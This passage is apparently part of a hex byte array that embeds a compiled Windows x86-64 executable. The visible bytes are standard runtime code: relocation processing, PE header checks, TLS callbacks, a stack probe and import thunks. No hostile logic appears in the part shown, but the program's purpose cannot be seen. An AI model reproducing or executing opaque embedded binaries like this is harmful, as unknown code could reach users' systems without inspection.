x01,0x00,0x00,0x8B,0x03,0x85,0xC0,0x0F,0x85,0x69,0x02,0x00,0x00,0x8B,0x43,0x04,0x85,0xC0,0x0F,0x85,0x5E,0x02,0x00,0x00,0x8B,0x53,0x08,0x83,0xFA,0x01,0x0F,0x85,0x92,0x02,0x00,0x00,0x48,0x83,0xC3,0x0C,0x4C,0x39,0xEB,0x0F,0x83,0x56,0xFF,0xFF,0xFF,0x4C,0x8B,0x35,0xAE,0x3C,0x00,0x00,0x41,0xBF,0xFF,0xFF,0xFF,0xFF,0xEB,0x65,0x66,0x0F,0x1F,0x44,0x00,0x00,0x83,0xF9,0x08,0x0F,0x84,0xD7,0x00,0x00,0x00,0x83,0xF9,0x10,0x0F,0x85,0x50,0x02,0x00,0x00,0x0F,0xB7,0x37,0x81,0xE2,0xC0,0x00,0x00,0x00,0x66,0x85,0xF6,0x0F,0x89,0xCC,0x01,0x00,0x00,0x48,0x81,0xCE,0x00,0x00,0xFF,0xFF,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x75,0x12,0x48,0x81,0xFE,0x00,0x80,0xFF,0xFF,0x7C,0x65,0x48,0x81,0xFE,0xFF,0xFF,0x00,0x00,0x7F,0x5C,0x48,0x89,0xF9,0xE8,0x61,0xFD,0xFF,0xFF,0x66,0x89,0x37,0x48,0x83,0xC3,0x0C,0x4C,0x39,0xEB,0x0F,0x83,0xD1,0x00,0x00,0x00,0x8B,0x03,0x8B,0x53,0x08,0x8B,0x7B,0x04,0x4C,0x01,0xF0,0x0F,0xB6,0xCA,0x4C,0x8B,0x08,0x4C,0x01,0xF7,0x83,0xF9,0x20,0x0F,0x84,0x0C,0x01,0x00,0x00,0x76,0x82,0x83,0xF9,0x40,0x0F,0x85,0xDB,0x01,0x00,0x00,0x48,0x8B,0x37,0x89,0xD1,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x81,0xE1,0xC0,0x00,0x00,0x00,0x0F,0x85,0x42,0x01,0x00,0x00,0x48,0x85,0xF6,0x78,0xAF,0x48,0x89,0x74,0x24,0x20,0x89,0xCA,0x49,0x89,0xF8,0x48,0x8D,0x0D,0x14,0x3B,0x00,0x00,0xE8,0x87,0xFC,0xFF,0xFF,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x85,0xD2,0x0F,0x85,0x68,0x01,0x00,0x00,0x8B,0x43,0x04,0x89,0xC2,0x0B,0x53,0x08,0x0F,0x85,0xF4,0xFE,0xFF,0xFF,0x48,0x83,0xC3,0x0C,0xE9,0xDE,0xFE,0xFF,0xFF,0x90,0x0F,0xB6,0x37,0x81,0xE2,0xC0,0x00,0x00,0x00,0x40,0x84,0xF6,0x0F,0x89,0x26,0x01,0x00,0x00,0x48,0x81,0xCE,0x00,0xFF,0xFF,0xFF,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x75,0x0F,0x48,0x81,0xFE,0xFF,0x00,0x00,0x00,0x7F,0x97,0x48,0x83,0xFE,0x80,0x7C,0x91,0x48,0x89,0xF9,0x48,0x83,0xC3,0x0C,0xE8,0x92,0xFC,0xFF,0xFF,0x40,0x88,0x37,0x4C,0x39,0xEB,0x0F,0x82,0x35,0xFF,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x8B,0x15,0xAE,0x8E,0x00,0x00,0x85,0xD2,0x0F,0x8E,0x03,0xFE,0xFF,0xFF,0x48,0x8B,0x35,0x2B,0xAE,0x00,0x00,0x31,0xDB,0x48,0x8D,0x7D,0xFC,0x0F,0x1F,0x44,0x00,0x00,0x48,0x8B,0x05,0x91,0x8E,0x00,0x00,0x48,0x01,0xD8,0x44,0x8B,0x00,0x45,0x85,0xC0,0x74,0x0D,0x48,0x8B,0x50,0x10,0x48,0x8B,0x48,0x08,0x49,0x89,0xF9,0xFF,0xD6,0x41,0x83,0xC4,0x01,0x48,0x83,0xC3,0x28,0x44,0x3B,0x25,0x66,0x8E,0x00,0x00,0x7C,0xD0,0xE9,0xBC,0xFD,0xFF,0xFF,0x0F,0x1F,0x00,0x8B,0x37,0x81,0xE2,0xC0,0x00,0x00,0x00,0x85,0xF6,0x79,0x74,0x49,0xBB,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x4C,0x09,0xDE,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x75,0x1C,0x4C,0x39,0xFE,0x0F,0x8F,0xEF,0xFE,0xFF,0xFF,0x48,0xB8,0xFF,0xFF,0xFF,0x7F,0xFF,0xFF,0xFF,0xFF,0x48,0x39,0xC6,0x0F,0x8E,0xDC,0xFE,0xFF,0xFF,0x48,0x89,0xF9,0xE8,0xE1,0xFB,0xFF,0xFF,0x89,0x37,0xE9,0x7C,0xFE,0xFF,0xFF,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x89,0xF9,0xE8,0xC8,0xFB,0xFF,0xFF,0x48,0x89,0x37,0xE9,0x62,0xFE,0xFF,0xFF,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x0F,0x84,0x37,0xFE,0xFF,0xFF,0xE9,0x44,0xFE,0xFF,0xFF,0x0F,0x1F,0x44,0x00,0x00,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x74,0x99,0xEB,0xB3,0x0F,0x1F,0x40,0x00,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x0F,0x84,0xDD,0xFE,0xFF,0xFF,0xE9,0xE7,0xFE,0xFF,0xFF,0x0F,0x1F,0x44,0x00,0x00,0x4C,0x39,0xEB,0x0F,0x83,0x08,0xFD,0xFF,0xFF,0x4C,0x8B,0x35,0x60,0x3A,0x00,0x00,0x8B,0x73,0x04,0x8B,0x3B,0x48,0x83,0xC3,0x08,0x4C,0x01,0xF6,0x03,0x3E,0x48,0x89,0xF1,0xE8,0x5A,0xFB,0xFF,0xFF,0x89,0x3E,0x4C,0x39,0xEB,0x72,0xE3,0xE9,0xCE,0xFE,0xFF,0xFF,0x89,0xCA,0x48,0x8D,0x0D,0x2D,0x39,0x00,0x00,0xE8,0xD0,0xFA,0xFF,0xFF,0x48,0x8D,0x0D,0xE9,0x38,0x00,0x00,0xE8,0xC4,0xFA,0xFF,0xFF,0x90,0x90,0x90,0x90,0x55,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x4C,0x8D,0x2D,0x88,0x8D,0x00,0x00,0x4C,0x89,0xE9,0xFF,0x15,0x5F,0xAC,0x00,0x00,0x48,0x8B,0x1D,0x58,0x8D,0x00,0x00,0x48,0x85,0xDB,0x74,0x38,0x4C,0x8B,0x25,0xB4,0xAC,0x00,0x00,0x48,0x8B,0x3D,0x4D,0xAC,0x00,0x00,0x0F,0x1F,0x44,0x00,0x00,0x8B,0x0B,0x41,0xFF,0xD4,0x48,0x89,0xC6,0xFF,0xD7,0x48,0x85,0xF6,0x74,0x0D,0x85,0xC0,0x75,0x09,0x48,0x8B,0x43,0x08,0x48,0x89,0xF1,0xFF,0xD0,0x48,0x8B,0x5B,0x10,0x48,0x85,0xDB,0x75,0xDB,0x4C,0x89,0xE9,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x5D,0x48,0xFF,0x25,0x4D,0xAC,0x00,0x00,0x0F,0x1F,0x44,0x00,0x00,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x8B,0x05,0xF5,0x8C,0x00,0x00,0x89,0xCF,0x48,0x89,0xD6,0x85,0xC0,0x75,0x14,0x31,0xC0,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0xBA,0x18,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0xE8,0xB9,0x09,0x00,0x00,0x48,0x89,0xC3,0x48,0x85,0xC0,0x74,0x33,0x48,0x89,0x70,0x08,0x48,0x8D,0x35,0xCE,0x8C,0x00,0x00,0x89,0x38,0x48,0x89,0xF1,0xFF,0x15,0xA3,0xAB,0x00,0x00,0x48,0x8B,0x05,0x9C,0x8C,0x00,0x00,0x48,0x89,0xF1,0x48,0x89,0x1D,0x92,0x8C,0x00,0x00,0x48,0x89,0x43,0x10,0xFF,0x15,0xD0,0xAB,0x00,0x00,0xEB,0xA2,0x83,0xC8,0xFF,0xEB,0x9F,0x90,0x55,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x8B,0x05,0x76,0x8C,0x00,0x00,0x89,0xCB,0x85,0xC0,0x75,0x10,0x31,0xC0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x48,0x8D,0x35,0x71,0x8C,0x00,0x00,0x48,0x89,0xF1,0xFF,0x15,0x48,0xAB,0x00,0x00,0x48,0x8B,0x0D,0x41,0x8C,0x00,0x00,0x48,0x85,0xC9,0x74,0x2F,0x31,0xD2,0xEB,0x13,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x89,0xCA,0x48,0x85,0xC0,0x74,0x1B,0x48,0x89,0xC1,0x8B,0x01,0x39,0xD8,0x48,0x8B,0x41,0x10,0x75,0xEB,0x48,0x85,0xD2,0x74,0x26,0x48,0x89,0x42,0x10,0xE8,0x0D,0x09,0x00,0x00,0x48,0x89,0xF1,0xFF,0x15,0x4C,0xAB,0x00,0x00,0x31,0xC0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x89,0x05,0xE9,0x8B,0x00,0x00,0xEB,0xD5,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x55,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x83,0xFA,0x02,0x0F,0x84,0xAC,0x00,0x00,0x00,0x77,0x2A,0x85,0xD2,0x74,0x46,0x8B,0x05,0xC8,0x8B,0x00,0x00,0x85,0xC0,0x0F,0x84,0xB8,0x00,0x00,0x00,0xC7,0x05,0xB6,0x8B,0x00,0x00,0x01,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x28,0x5B,0x5D,0xC3,0x66,0x90,0x83,0xFA,0x03,0x75,0xED,0x8B,0x05,0x9D,0x8B,0x00,0x00,0x85,0xC0,0x74,0xE3,0xE8,0x0C,0xFE,0xFF,0xFF,0xEB,0xDC,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x8B,0x05,0x82,0x8B,0x00,0x00,0x85,0xC0,0x75,0x6E,0x8B,0x05,0x78,0x8B,0x00,0x00,0x83,0xF8,0x01,0x75,0xBD,0x48,0x8B,0x1D,0x64,0x8B,0x00,0x00,0x48,0x85,0xDB,0x74,0x18,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x48,0x89,0xD9,0x48,0x8B,0x5B,0x10,0xE8,0x4C,0x08,0x00,0x00,0x48,0x85,0xDB,0x75,0xEF,0x48,0x8D,0x0D,0x60,0x8B,0x00,0x00,0x48,0xC7,0x05,0x35,0x8B,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x05,0x33,0x8B,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0x15,0x1D,0xAA,0x00,0x00,0xE9,0x72,0xFF,0xFF,0xFF,0xE8,0x3B,0x04,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x28,0x5B,0x5D,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xE8,0x83,0xFD,0xFF,0xFF,0xEB,0x8B,0x90,0x48,0x8D,0x0D,0x19,0x8B,0x00,0x00,0xFF,0x15,0x33,0xAA,0x00,0x00,0xE9,0x36,0xFF,0xFF,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x31,0xC0,0x66,0x81,0x39,0x4D,0x5A,0x75,0x0F,0x48,0x63,0x51,0x3C,0x48,0x01,0xD1,0x81,0x39,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x31,0xC0,0x66,0x81,0x79,0x18,0x0B,0x02,0x0F,0x94,0xC0,0xC3,0x0F,0x1F,0x40,0x00,0x48,0x63,0x41,0x3C,0x48,0x01,0xC1,0x0F,0xB7,0x41,0x14,0x44,0x0F,0xB7,0x41,0x06,0x48,0x8D,0x44,0x01,0x18,0x66,0x45,0x85,0xC0,0x74,0x32,0x41,0x8D,0x48,0xFF,0x48,0x8D,0x0C,0x89,0x4C,0x8D,0x4C,0xC8,0x28,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x40,0x0C,0x4C,0x89,0xC1,0x4C,0x39,0xC2,0x72,0x08,0x03,0x48,0x08,0x48,0x39,0xCA,0x72,0x0B,0x48,0x83,0xC0,0x28,0x4C,0x39,0xC8,0x75,0xE3,0x31,0xC0,0xC3,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCE,0xE8,0x9B,0x07,0x00,0x00,0x48,0x83,0xF8,0x08,0x77,0x7D,0x48,0x8B,0x15,0xDE,0x36,0x00,0x00,0x31,0xDB,0x66,0x81,0x3A,0x4D,0x5A,0x75,0x5B,0x48,0x63,0x42,0x3C,0x48,0x01,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x75,0x4C,0x66,0x81,0x78,0x18,0x0B,0x02,0x75,0x44,0x0F,0xB7,0x50,0x14,0x48,0x8D,0x5C,0x10,0x18,0x0F,0xB7,0x50,0x06,0x66,0x85,0xD2,0x74,0x44,0x8D,0x42,0xFF,0x48,0x8D,0x04,0x80,0x48,0x8D,0x7C,0xC3,0x28,0xEB,0x0F,0x66,0x0F,0x1F,0x44,0x00,0x00,0x48,0x83,0xC3,0x28,0x48,0x39,0xFB,0x74,0x27,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xF2,0x48,0x89,0xD9,0xE8,0x36,0x07,0x00,0x00,0x85,0xC0,0x75,0xE2,0x48,0x89,0xD8,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x31,0xDB,0x48,0x89,0xD8,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x15,0x49,0x36,0x00,0x00,0x31,0xC0,0x66,0x81,0x3A,0x4D,0x5A,0x75,0x10,0x4C,0x63,0x42,0x3C,0x49,0x01,0xD0,0x41,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x66,0x41,0x81,0x78,0x18,0x0B,0x02,0x75,0xEF,0x41,0x0F,0xB7,0x40,0x14,0x48,0x29,0xD1,0x49,0x8D,0x44,0x00,0x18,0x45,0x0F,0xB7,0x40,0x06,0x66,0x45,0x85,0xC0,0x74,0x34,0x41,0x8D,0x50,0xFF,0x48,0x8D,0x14,0x92,0x4C,0x8D,0x4C,0xD0,0x28,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x40,0x0C,0x4C,0x89,0xC2,0x4C,0x39,0xC1,0x72,0x08,0x03,0x50,0x08,0x48,0x39,0xD1,0x72,0xAC,0x48,0x83,0xC0,0x28,0x4C,0x39,0xC8,0x75,0xE3,0x31,0xC0,0xC3,0x48,0x8B,0x05,0xC9,0x35,0x00,0x00,0x31,0xC9,0x66,0x81,0x38,0x4D,0x5A,0x75,0x0F,0x48,0x63,0x50,0x3C,0x48,0x01,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x09,0x89,0xC8,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x66,0x81,0x78,0x18,0x0B,0x02,0x75,0xEF,0x0F,0xB7,0x48,0x06,0x89,0xC8,0xC3,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x4C,0x8B,0x05,0x89,0x35,0x00,0x00,0x31,0xC0,0x66,0x41,0x81,0x38,0x4D,0x5A,0x75,0x0F,0x49,0x63,0x50,0x3C,0x4C,0x01,0xC2,0x81,0x3A,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x66,0x81,0x7A,0x18,0x0B,0x02,0x75,0xF0,0x0F,0xB7,0x42,0x14,0x44,0x0F,0xB7,0x42,0x06,0x48,0x8D,0x44,0x02,0x18,0x66,0x45,0x85,0xC0,0x74,0x2C,0x41,0x8D,0x50,0xFF,0x48,0x8D,0x14,0x92,0x48,0x8D,0x54,0xD0,0x28,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xF6,0x40,0x27,0x20,0x74,0x09,0x48,0x85,0xC9,0x74,0xBD,0x48,0x83,0xE9,0x01,0x48,0x83,0xC0,0x28,0x48,0x39,0xC2,0x75,0xE8,0x31,0xC0,0xC3,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x66,0x90,0x48,0x8B,0x05,0x09,0x35,0x00,0x00,0x31,0xD2,0x66,0x81,0x38,0x4D,0x5A,0x75,0x0F,0x48,0x63,0x48,0x3C,0x48,0x01,0xC1,0x81,0x39,0x50,0x45,0x00,0x00,0x74,0x09,0x48,0x89,0xD0,0xC3,0x0F,0x1F,0x44,0x00,0x00,0x66,0x81,0x79,0x18,0x0B,0x02,0x48,0x0F,0x44,0xD0,0x48,0x89,0xD0,0xC3,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x15,0xC9,0x34,0x00,0x00,0x31,0xC0,0x66,0x81,0x3A,0x4D,0x5A,0x75,0x10,0x4C,0x63,0x42,0x3C,0x49,0x01,0xD0,0x41,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x66,0x41,0x81,0x78,0x18,0x0B,0x02,0x75,0xEF,0x48,0x29,0xD1,0x45,0x0F,0xB7,0x48,0x06,0x41,0x0F,0xB7,0x50,0x14,0x49,0x8D,0x54,0x10,0x18,0x66,0x45,0x85,0xC9,0x74,0xD7,0x41,0x8D,0x41,0xFF,0x48,0x8D,0x04,0x80,0x4C,0x8D,0x4C,0xC2,0x28,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x42,0x0C,0x4C,0x89,0xC0,0x4C,0x39,0xC1,0x72,0x08,0x03,0x42,0x08,0x48,0x39,0xC1,0x72,0x0C,0x48,0x83,0xC2,0x28,0x4C,0x39,0xCA,0x75,0xE3,0x31,0xC0,0xC3,0x8B,0x42,0x24,0xF7,0xD0,0xC1,0xE8,0x1F,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x4C,0x8B,0x1D,0x39,0x34,0x00,0x00,0x45,0x31,0xC0,0x66,0x41,0x81,0x3B,0x4D,0x5A,0x41,0x89,0xCA,0x75,0x0F,0x49,0x63,0x4B,0x3C,0x4C,0x01,0xD9,0x81,0x39,0x50,0x45,0x00,0x00,0x74,0x0C,0x4C,0x89,0xC0,0xC3,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x66,0x81,0x79,0x18,0x0B,0x02,0x75,0xEC,0x8B,0x81,0x90,0x00,0x00,0x00,0x85,0xC0,0x74,0xE2,0x0F,0xB7,0x51,0x14,0x44,0x0F,0xB7,0x49,0x06,0x48,0x8D,0x54,0x11,0x18,0x66,0x45,0x85,0xC9,0x74,0xCE,0x41,0x8D,0x49,0xFF,0x48,0x8D,0x0C,0x89,0x4C,0x8D,0x4C,0xCA,0x28,0x0F,0x1F,0x44,0x00,0x00,0x44,0x8B,0x42,0x0C,0x4C,0x89,0xC1,0x4C,0x39,0xC0,0x72,0x08,0x03,0x4A,0x08,0x48,0x39,0xC8,0x72,0x14,0x48,0x83,0xC2,0x28,0x49,0x39,0xD1,0x75,0xE3,0x45,0x31,0xC0,0x4C,0x89,0xC0,0xC3,0x0F,0x1F,0x40,0x00,0x4C,0x01,0xD8,0xEB,0x0B,0x0F,0x1F,0x00,0x41,0x83,0xEA,0x01,0x48,0x83,0xC0,0x14,0x8B,0x48,0x04,0x85,0xC9,0x75,0x07,0x8B,0x50,0x0C,0x85,0xD2,0x74,0xD7,0x45,0x85,0xD2,0x7F,0xE5,0x44,0x8B,0x40,0x0C,0x4D,0x01,0xD8,0x4C,0x89,0xC0,0xC3,0x90,0x90,0xDB,0xE3,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x51,0x50,0x48,0x3D,0x00,0x10,0x00,0x00,0x48,0x8D,0x4C,0x24,0x18,0x72,0x19,0x48,0x81,0xE9,0x00,0x10,0x00,0x00,0x48,0x83,0x09,0x00,0x48,0x2D,0x00,0x10,0x00,0x00,0x48,0x3D,0x00,0x10,0x00,0x00,0x77,0xE7,0x48,0x29,0xC1,0x48,0x83,0x09,0x00,0x58,0x59,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xB8,0x01,0x00,0x00,0x00,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x45,0x31,0xC0,0x48,0x89,0xC8,0x48,0x85,0xD2,0x75,0x14,0xEB,0x17,0x0F,0x1F,0x00,0x48,0x83,0xC0,0x01,0x49,0x89,0xC0,0x49,0x29,0xC8,0x49,0x39,0xD0,0x73,0x05,0x80,0x38,0x00,0x75,0xEC,0x4C,0x89,0xC0,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x45,0x31,0xC0,0x48,0x89,0xD0,0x48,0x85,0xD2,0x75,0x0E,0xEB,0x17,0x0F,0x1F,0x00,0x49,0x83,0xC0,0x01,0x4C,0x39,0xC0,0x74,0x0B,0x66,0x42,0x83,0x3C,0x41,0x00,0x75,0xEF,0x4C,0x89,0xC0,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xE9,0x6B,0x04,0x00,0x00,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x55,0x56,0x53,0x48,0x83,0xEC,0x30,0x48,0x8D,0x6C,0x24,0x30,0x48,0x8B,0x05,0x3D,0x13,0x00,0x00,0x48,0x89,0xD6,0x48,0x8D,0x15,0xE3,0xFF,0xFF,0xFF,0x48,0x89,0xCB,0x48,0x39,0xD0,0x74,0x13,0x48,0x89,0xF2,0x48,0x89,0xD9,0x48,0x83,0xC4,0x30,0x5B,0x5E,0x5D,0x48,0xFF,0xE0,0x0F,0x1F,0x00,0x4C,0x89,0x4D,0xF0,0x48,0x8D,0x0D,0xED,0x31,0x00,0x00,0x4C,0x89,0x45,0xF8,0xFF,0x15,0xD3,0xA4,0x00,0x00,0x48,0x8D,0x15,0xF2,0x31,0x00,0x00,0x48,0x89,0xC1,0xFF,0x15,0xCB,0xA4,0x00,0x00,0x4C,0x8B,0x4D,0xF0,0x4C,0x8B,0x45,0xF8,0x48,0x89,0xD9,0x48,0x85,0xC0,0x48,0x8D,0x15,0x7E,0xFF,0xFF,0xFF,0x48,0x0F,0x44,0xC2,0x48,0x89,0xF2,0x48,0x89,0x05,0xD0,0x12,0x00,0x00,0x48,0x83,0xC4,0x30,0x5B,0x5E,0x5D,0x48,0xFF,0xE0,0x66,0x0F,0x1F,0x44,0x00,0x00,0x55,0x56,0x53,0x48,0x83,0xEC,0x30,0x48,0x8D,0x6C,0x24,0x30,0x48,0x8B,0x05,0xAD,0x12,0x00,0x00,0x48,0x89,0xD6,0x48,0x8D,0x15,0x53,0xFF,0xFF,0xFF,0x48,0x89,0xCB,0x48,0x39,0xD0,0x74,0x13,0x48,0x89,0xF2,0x48,0x89,0xD9,0x48,0x83,0xC4,0x30,0x5B,0x5E,0x5D,0x48,0xFF,0xE0,0x0F,0x1F,0x00,0x4C,0x89,0x4D,0xF0,0x48,0x8D,0x0D,0x5D,0x31,0x00,0x00,0x4C,0x89,0x45,0xF8,0xFF,0x15,0x43,0xA4,0x00,0x00,0x48,0x8D,0x15,0x62,0x31,0x00,0x00,0x48,0x89,0xC1,0xFF,0x15,0x3B,0xA4,0x00,0x00,0x4C,0x8B,0x4D,0xF0,0x4C,0x8B,0x45,0xF8,0x48,0x89,0xD9,0x48,0x85,0xC0,0x48,0x8D,0x15,0xEE,0xFE,0xFF,0xFF,0x48,0x0F,0x44,0xC2,0x48,0x89,0xF2,0x48,0x89,0x05,0x40,0x12,0x00,0x00,0x48,0x83,0xC4,0x30,0x5B,0x5E,0x5D,0x48,0xFF,0xE0,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x89,0xCB,0xE8,0x8E,0x01,0x00,0x00,0x89,0xD9,0x48,0x8D,0x14,0x49,0x48,0xC1,0xE2,0x04,0x48,0x01,0xD0,0x48,0x83,0xC4,0x28,0x5B,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x48,0x85,0xC9,0x74,0x12,0x66,0x0F,0xEF,0xC0,0x31,0xC0,0x48,0xC7,0x41,0x10,0x00,0x00,0x00,0x00,0x0F,0x11,0x01,0xC3,0xB8,0xFF,0xFF,0xFF,0xFF,0xC3,0x0F,0x1F,0x00,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCB,0x48,0x89,0xD7,0x48,0x85,0xC9,0x0F,0x84,0xB2,0x00,0x00,0x00,0xB9,0x08,0x00,0x00,0x00,0xE8,0x40,0x01,0x00,0x00,0x48,0x83,0x3B,0x00,0x74,0x6A,0x48,0x8B,0x53,0x08,0x48,0x8B,0x43,0x10,0x48,0x39,0xC2,0x74,0x25,0x48,0x8D,0x42,0x08,0xB9,0x08,0x00,0x00,0x00,0x48,0x89,0x43,0x08,0x48,0x89,0x3A,0xE8,0x28,0x01,0x00,0x00,0x31,0xC0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5F,0x41,0x5C,0x5D,0xC3,0x0F,0x1F,0x00,0x48,0x8B,0x0B,0x48,0x89,0xD6,0x48,0x29,0xCE,0x49,0x89,0xF4,0x49,0xC1,0xFC,0x03,0x49,0xC1,0xE4,0x04,0x4C,0x89,0xE2,0xE8,0x5C,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x45,0x48,0x89,0x03,0x48,0x8D,0x14,0x30,0x4C,0x01,0xE0,0x48,0x89,0x43,0x10,0xEB,0xAA,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0xB9,0x20,0x00,0x00,0x00,0xE8,0xF1,0x00,0x00,0x00,0x48,0x89,0x03,0x48,0x89,0xC2,0x48,0x85,0xC0,0x74,0x14,0x48,0x89,0x43,0x08,0x48,0x8D,0x80,0x00,0x01,0x00,0x00,0x48,0x89,0x43,0x10,0xE9,0x70,0xFF,0xFF,0xFF,0xB9,0x08,0x00,0x00,0x00,0xE8,0xA8,0x00,0x00,0x00,0x83,0xC8,0xFF,0xE9,0x7A,0xFF,0xFF,0xFF,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCF,0xB9,0x08,0x00,0x00,0x00,0xE8,0x6E,0x00,0x00,0x00,0x48,0x8B,0x37,0x66,0x0F,0xEF,0xC0,0x48,0x8B,0x5F,0x08,0x48,0xC7,0x47,0x10,0x00,0x00,0x00,0x00,0xB9,0x08,0x00,0x00,0x00,0x0F,0x11,0x07,0xE8,0x5E,0x00,0x00,0x00,0x48,0x85,0xF6,0x74,0x24,0x48,0x83,0xEB,0x08,0x48,0x39,0xF3,0x72,0x13,0x48,0x8B,0x03,0x48,0x85,0xC0,0x74,0xEF,0xFF,0xD0,0x48,0x83,0xEB,0x08,0x48,0x39,0xF3,0x73,0xED,0x48,0x89,0xF1,0xE8,0x5D,0x00,0x00,0x00,0x31,0xC0,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x90,0x90,0xFF,0x25,0xDA,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xDA,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xDA,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xDA,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xDA,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xDA,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xDA,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0